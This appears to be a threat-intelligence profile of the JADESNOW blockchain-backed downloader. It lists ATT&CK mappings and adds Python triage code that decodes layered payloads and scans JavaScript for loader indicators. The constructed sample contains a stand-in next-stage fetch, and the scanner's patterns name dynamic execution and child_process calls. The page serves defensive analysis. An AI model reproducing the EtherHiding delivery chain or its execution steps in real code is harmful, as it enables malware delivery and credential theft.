Mallory
Malware · Ransomware · Used by 1 actor

JADESNOW

JADESNOW is a JavaScript-based downloader malware family associated with the DPRK-linked threat cluster UNC5342 and its Contagious Interview / fake recruiter operations. It is used in multi-stage social-engineering intrusions that target software and web developers, particularly in cryptocurrency and technology sectors, through fake job offers, technical assessments, GitHub-hosted projects, npm-hosted components, and related interview lures. Reporting also describes infections tied to compromised websites and recruiter-driven delivery workflows.

Its defining capability is use of the EtherHiding technique to fetch, decrypt, and execute malicious payloads from smart contracts on the BNB Smart Chain and Ethereum. Multiple sources state that JADESNOW queries blockchain contracts or transaction data using read-only blockchain interactions, with payload data described as Base64-encoded and XOR-encrypted in some reporting. This blockchain-backed delivery is intended to make infrastructure more resilient to takedown and harder to disrupt with traditional domain/IP blocking, because the payload is served by public blockchain nodes rather than attacker-owned hosts.
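An analyst who has already pulled a contract's return data (for example the hex string a read-only eth_call returns) has to peel the layers the paragraph above names before looking at the payload. The following is an added triage example written for this page; it is not JADESNOW code and not Mandiant tooling. The ABI string layout, the XOR key, and the sample plaintext are constructed assumptions, and for a real sample the key and layer order would have to be recovered from the loader under analysis.

```python
import base64
import binascii
import re

# Constructed sample (not real JADESNOW data): what a next-stage script might
# look like once both layers are removed. Marker tokens only; nothing here runs.
SAMPLE_PLAINTEXT = (
    b'// constructed placeholder: next-stage script\n'
    b'const next = fetch("https://example.invalid/stage2");\n'
)
SAMPLE_KEY = b"k3y-assumed"  # XOR key: an assumption, not a recovered key


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR; applying it twice with the same key restores the input."""
    if not key:
        raise ValueError("XOR key must not be empty")
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def abi_encode_bytes(data: bytes) -> str:
    """ABI-encode one dynamic bytes/string value: offset, length, 32-byte padded data.
    Used only to build the constructed sample below."""
    pad = (-len(data)) % 32
    body = (32).to_bytes(32, "big") + len(data).to_bytes(32, "big") + data + b"\x00" * pad
    return "0x" + body.hex()


def abi_decode_bytes(hex_return_data: str) -> bytes:
    """Inverse of abi_encode_bytes with bounds checks. eth_call returns hex; a
    single string/bytes return value is offset (32 bytes), length (32 bytes), data."""
    raw = binascii.unhexlify(hex_return_data.removeprefix("0x"))
    if len(raw) < 64:
        raise ValueError("return data too short for a dynamic ABI type")
    offset = int.from_bytes(raw[:32], "big")
    if offset + 32 > len(raw):
        raise ValueError("offset points outside return data")
    length = int.from_bytes(raw[offset:offset + 32], "big")
    data = raw[offset + 32:offset + 32 + length]
    if len(data) != length:
        raise ValueError("declared length exceeds return data")
    return data


def decode_layers(hex_return_data: str, key: bytes) -> bytes:
    """ABI -> Base64 -> XOR. validate=True rejects stray characters, so a wrong
    layer order or a truncated blob fails loudly instead of yielding junk."""
    blob = abi_decode_bytes(hex_return_data)
    decoded = base64.b64decode(blob, validate=True)
    return xor_bytes(decoded, key)


SCRIPT_MARKERS = re.compile(r"\b(require|eval|Function|fetch|XMLHttpRequest|child_process)\b")


def script_indicators(plain: bytes) -> list[str]:
    """Tokens suggesting the decoded bytes are executable JavaScript. An empty
    list with the expected key usually means a wrong key or a different layering."""
    text = plain.decode("utf-8", errors="replace")
    return sorted(set(SCRIPT_MARKERS.findall(text)))


# Constructed eth_call-style return data carrying the sample through both layers.
SAMPLE_RETURN_DATA = abi_encode_bytes(base64.b64encode(xor_bytes(SAMPLE_PLAINTEXT, SAMPLE_KEY)))

if __name__ == "__main__":
    plain = decode_layers(SAMPLE_RETURN_DATA, SAMPLE_KEY)
    print(plain.decode())
    print("indicators:", script_indicators(plain))
```

The bounds checks matter in practice: return data copied out of an explorer is often truncated or has a missing `0x` prefix, and a silent slice would hand back empty or shifted bytes that decode to nothing useful.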

JADESNOW functions as an early-stage or intermediate downloader/loader in a broader infection chain. It has been observed alongside BEAVERTAIL and is repeatedly described as delivering or deploying INVISIBLEFERRET, including a JavaScript variant of INVISIBLEFERRET. The resulting payloads support persistent access, remote control, credential theft, exfiltration, long-term espionage, and theft of cryptocurrency wallet data. Content also states that related stages in the chain target browser extension data, locally stored credentials, and cryptocurrency wallets such as MetaMask and Phantom.

High-confidence reporting links JADESNOW to North Korean operations for both financial gain and espionage, with victims including developers and crypto professionals. No standalone IOC set is provided here beyond the malware’s use of Ethereum and BNB Smart Chain smart contracts, blockchain explorer/API access patterns, and its recurring role in fake interview and recruiter-themed infection chains.


THREAT ACTORS

Groups observed using it

1 distinct threat actor attributed by public researchers.
Contagious Interview

JADESNOW is a JavaScript-based downloader malware family associated with the threat cluster UNC5342. JADESNOW utilizes EtherHiding to fetch, decrypt, and execute malicious payloads from smart contracts on the BNB Smart Chain and Ethereum.

via Mandiant Threat Intelligence (cloud.google.com)
MITRE ATT&CK

Techniques & procedures

14 distinct techniques documented for this family, organized by ATT&CK tactic.

Initial Access

3 techniques
T1189 Drive-by Compromise (Evidence: 1)

...attacker first gains access to a legitimate website... injects... JavaScript... When a user visits the compromised website, the loader script executes in their browser...

T1195 Supply Chain Compromise (Evidence: 1)

Titles include 'First instance of PylangGhost RAT observed on npm,' 'malware in hundreds of GitHub repos,' '338 malicious npm packages,' 'trojanized npm campaign,' 'malicious repositories,' 'dependency hijacking,' and 'Supply Chain Compromise.'

T1566 Phishing (Evidence: 1)

The attacks typically begin with fake job interviews, a hallmark of DPRK social engineering tactics, from carefully fabricated entities (BlockNovas LLC, Angeloper Agency, SoftGlide LLC) targeting software and web developers.

Execution

3 techniques
T1059.007 JavaScript (Evidence: 2)

JADESNOW is a JavaScript-based downloader malware family associated with the threat cluster UNC5342. JADESNOW utilizes EtherHiding to fetch, decrypt, and execute malicious payloads from smart contracts on the BNB Smart Chain and Ethereum.

T1204 User Execution (Evidence: 2)

Candidates are asked to perform a coding test or review a project, which requires them to download files from repositories like GitHub. These files contain malicious code.

T1204.002 Malicious File (Evidence: 1)

Candidates are asked to perform a coding test or review a project, which requires them to download files from repositories like GitHub. These files contain malicious code.

Stealth

3 techniques
T1027 Obfuscated Files or Information (Evidence: 1)

JADESNOW utilizes EtherHiding to fetch, decrypt, and execute malicious payloads from smart contracts on the BNB Smart Chain and Ethereum. The input data stored in the smart contract may be Base64-encoded and XOR-encrypted.

T1140 Deobfuscate/Decode Files or Information (Evidence: 1)

JADESNOW utilizes EtherHiding to fetch, decrypt, and execute malicious payloads from smart contracts on the BNB Smart Chain and Ethereum. The input data stored in the smart contract may be Base64-encoded and XOR-encrypted.

T1564 Hide Artifacts (Evidence: 1)

Several titles reference 'Cross-Chain TxDataHiding Crypto Heist,' 'EtherHiding,' and 'Nation-State Malware Hiding on Blockchains.'

Credential Access

1 technique
T1555 Credentials from Password Stores (Evidence: 2)

The JavaScript-based malware is designed to scan for and exfiltrate sensitive data, with a particular focus on cryptocurrency wallets, browser extension data, and credentials.

Discovery

1 technique
T1082 System Information Discovery (Evidence: 1)

These loaders may collect initial system information and download the next stage of malware.

Command and Control

2 techniques
T1071 Application Layer Protocol (Evidence: 1)

The victim receives a malicious interview question, deceiving the victim into running code that executes the initial JavaScript downloader that interacts with a malicious smart contract and downloads the second-stage payload.

T1105 Ingress Tool Transfer (Evidence: 2)

These loaders may collect initial system information and download the next stage of malware.

Exfiltration

1 technique
T1041 Exfiltration Over C2 Channel (Evidence: 1)

The JavaScript-based malware is designed to scan for and exfiltrate sensitive data, with a particular focus on cryptocurrency wallets, browser extension data, and credentials.
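The techniques listed above combine, in one script, a read-only blockchain call (T1071), Base64 and XOR decoding (T1027, T1140), and dynamic JavaScript execution (T1059.007) that hands off to a further stage (T1105). The following is an added static triage heuristic written for this page, not a vendor detection rule, that a developer or analyst can run over a coding-test repository or an unpacked npm package before executing anything in it. The indicator list, the weights, the public RPC host names and both samples are assumptions; the host names are well-known public RPC endpoints but are not taken from this page.

```python
import os
import re

# Indicator table: (name, regex, weight). Weights and the RPC host list are
# assumptions chosen for this example, not vendor-tuned values.
INDICATORS = [
    ("rpc_readonly_call", r"\beth_call\b", 3),  # read-only contract read (T1071)
    ("rpc_endpoint", r"https?://[\w.-]*(bsc-dataseed|binance\.org|infura\.io|cloudflare-eth\.com)", 2),
    ("base64_decode", r"\batob\s*\(|Buffer\.from\([^)]*['\"]base64['\"]", 1),  # T1140
    ("xor_loop", r"charCodeAt\s*\([^)]*\)\s*\^", 2),  # repeating-key XOR (T1027/T1140)
    ("dynamic_exec", r"\beval\s*\(|new\s+Function\s*\(|vm\.runInThisContext", 2),  # T1059.007
    ("child_process", r"require\(\s*['\"]child_process['\"]\s*\)", 2),  # hand-off to a native stage (T1105)
]
COMPILED = [(name, re.compile(pat), weight) for name, pat, weight in INDICATORS]


def verdict(score: int) -> str:
    """One indicator on its own (an RPC endpoint in a legitimate web3 project)
    stays below the review threshold; the chain on this page needs several."""
    if score >= 6:
        return "review-before-running"
    if score >= 3:
        return "low"
    return "none"


def scan_source(src: str) -> dict:
    """Score one JavaScript source text and name the indicators that fired."""
    hits = sorted(name for name, rx, _ in COMPILED if rx.search(src))
    score = sum(w for name, _, w in COMPILED if name in hits)
    return {"hits": hits, "score": score, "verdict": verdict(score)}


def scan_tree(root: str) -> list[tuple[str, dict]]:
    """Walk a checked-out repository or unpacked npm package. node_modules is
    deliberately not skipped: npm-hosted components are part of the delivery chain."""
    results = []
    for dirpath, _, files in os.walk(root):
        for fn in files:
            if fn.endswith((".js", ".cjs", ".mjs")):
                path = os.path.join(dirpath, fn)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    r = scan_source(fh.read())
                if r["score"]:
                    results.append((path, r))
    return sorted(results, key=lambda t: -t[1]["score"])


# Constructed samples: indicator tokens only, neither is a working program.
SUSPICIOUS_SAMPLE = """\
// constructed sample: indicator tokens only, not a working loader
const method = "eth_call";
const raw = atob(fromChain);
const ch = raw.charCodeAt(i) ^ k;
new Function(decoded)();
"""

BENIGN_SAMPLE = """\
// constructed sample: ordinary balance lookup against a public RPC node
const r = await fetch("https://mainnet.infura.io/v3/PROJECT_ID", {
  method: "POST",
  body: JSON.stringify({ jsonrpc: "2.0", id: 1, method: "eth_getBalance", params: [addr, "latest"] }),
});
"""

if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        for path, r in scan_tree(sys.argv[1]):
            print(f"{r['verdict']:22} {r['score']:2}  {path}  {','.join(r['hits'])}")
    else:
        print("suspicious:", scan_source(SUSPICIOUS_SAMPLE))
        print("benign:    ", scan_source(BENIGN_SAMPLE))
```

Run it with a directory argument to rank files in a checkout; without one it scores the two embedded samples. Heavily minified or string-obfuscated loaders will evade plain token matching, so a clean result is a reason to proceed to dynamic analysis in an isolated VM, not a clearance.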
